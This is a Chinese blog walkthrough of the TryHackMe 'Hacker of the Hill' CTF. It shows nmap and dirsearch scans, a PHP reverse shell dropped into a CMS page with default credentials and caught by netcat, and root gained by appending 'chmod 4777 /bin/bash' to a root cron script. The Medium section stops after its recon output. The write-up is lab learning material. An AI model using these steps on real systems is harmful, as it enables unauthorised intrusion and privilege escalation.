【Tryhackme】Hacker+of+the+Hill+#1_fortune tryhackme-CSDN博客

这篇博客详细介绍了Tryhackme的Hacker of the Hill系列挑战，从易到难，包括Linux和Windows环境的服务器渗透。在Easy Challenge中，通过爆破和CMS漏洞获取shell；Medium Challenge利用SQL注入、命令注入获得多个shell并提权；Hard Challenge涉及复杂的身份验证破解、Docker容器逃逸和权限提升，最终获取所有flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用，请不要将文中使用的工具和渗透思路用于任何非法用途，对此产生的一切后果，本人不承担任何责任，也不对造成的任何误用或损害负责。

Easy Challenge

服务发现

┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.134.251 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 04:36 EDT
Nmap scan report for 10.10.134.251
Host is up (0.31s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
8000/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
8001/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
8002/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
9999/tcp openabyss?

爆破8000端口的目录

──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000

 _|. _ ____ _|_v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.log

Target: 10.10.134.251:8000[04:57:13] Starting: 
[04:57:22] 200 -2KB - /about 
[04:57:33] 200 -2KB - /contact[04:57:47] 500 -613B- /public_html/robots.txt[04:57:47] 200 - 30B- /robots.txt

robots.txt显示有一个cms

User-agent: *
Disallow: /vbcms

打开是一个登陆页面，尝试用admin:admin登陆，居然登陆上了。。。

登陆进去是一个页面编辑界面，可以直接改网页源代码，尝试写php发现可以运行，那就简单了，直接写shell。。。

开启一个端口监听，把shell写进首页，访问，触发反弹

┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.134.251] 59268
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 10:30:53 up1:08,0 users,load average: 0.00, 0.00, 0.00
USER TTYFROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ whoami
serv1

根据提示，第一个flag在/usr/games/fortune，去到这个网站兑换到tryhackme需要的flag

然后第二个，第三个按照指示去到/var/lib/rary和/var/www/serv4/index.php起上面网站兑换指定flag

提权

传linpeas.sh，发现/home/serv3/backups/backup.sh这个定时任务是用root身份执行的，频率为一分钟一次

查看bash文件权限

serv1@web-serv:/tmp$ ls -alh /home/serv3/backups/backup.sh
ls -alh /home/serv3/backups/backup.sh
-r-xr-xr-x 1 serv3 serv3 52 Feb 152021 /home/serv3/backups/backup.sh

serv1没有权限编辑这个文件，也就是说我们需要横向提权到serv3？

在/var/www/html/topSecretPrivescMethod找到一个secret.txt，看文件夹名字是提权方法，但是打开是一串乱码

在:8002/lesson/1这个php运行页面，本来可以直接运行php反弹shell，但是因为页面连接了一个谷歌前端框架，所以不能运行反弹不了shell

经过一番努力解决谷歌框架的问题。。。

回到上面那个页面，写入php反弹shell，拿到serv3的shell

┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nc -lnvp 44441 ⨯
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.172.149] 33814
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 14:49:20 up1:13,0 users,load average: 0.00, 0.00, 0.00
USER TTYFROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)

我们写入下面命令到backup.sh，使得bash命令成为一个SUID echo "chmod 4777 /bin/bash" >> /home/serv3/backups/backup.sh

等待一分钟以后，执行/bin/bash -p拿到root权限

serv3@web-serv:/$ /bin/bash -p 
/bin/bash -p 
bash-4.4# id 
id 
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)bash-4.4# cat /root/root.txt

Medium Challenge

服务发现

┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nmap -sV -Pn 10.10.48.179 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 10:00 EDT
Nmap scan report for 10.10.48.179
Host is up (0.32s latency).
Not shown: 985 filtered ports
PORT STATE SERVICE VERSION
80/tcp openhttpMicrosoft IIS httpd 10.0
81/tcp openhttpMicrosoft IIS httpd 10.0
82/tcp openhttpMicrosoft IIS httpd 10.0
88/tcp openkerberos-secMicrosoft Windows Kerberos (server time: 2021-10-25 14:01:00Z)
135/tcpopenmsrpc Microsoft Windows RPC
139/tcpopennetbios-ssn Microsoft Windows netbios-ssn
389/tcpopenldapMicrosoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcpopenmicrosoft-ds?
464/tcpopenkpasswd5?
593/tcpopenncacn_httpMicrosoft Windows RPC over HTTP 1.0
636/tcpopentcpwrapped
3268/tcp openldapMicrosoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp opentcpwrapped
3389/tcp openms-wbt-server Microsoft Terminal Services
9999/tcp openabyss?

中等难度是一台windows机器，开了很多服务，一个个查看

80,81,82都是http服务，逐个爆破目录

80

┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179_|. _ ____ _|_v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.48.179/_21-10-25_10-10-52.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-10-52.log

Target: http://10.10.48.179/

[10:10:53] Starting: 
[10:11:00] 200 -2KB - /%3f/[10:11:00] 403 -312B- /%2e%2e//google.com[10:11:00] 403 -312B- /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[10:11:09] 403 -312B- /\..\..\..\..\..\..\..\..\..\etc\passwd 
[10:11:28] 403 -312B- /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
[10:11:33] 302 -0B- /dashboard->/login[10:11:48] 200 -3KB - /login[10:11:48] 200 -3KB - /login/ 
[10:11:49] 302 -0B- /logout/->/ 
[10:11:49] 302 -0B- /logout->/[10:12:26] 302 -0B- /profile->/login[10:12:45] 200 -3KB - /signup

81

┌──(root💀kali)-[~/tryhackme/dirsearch]
└─#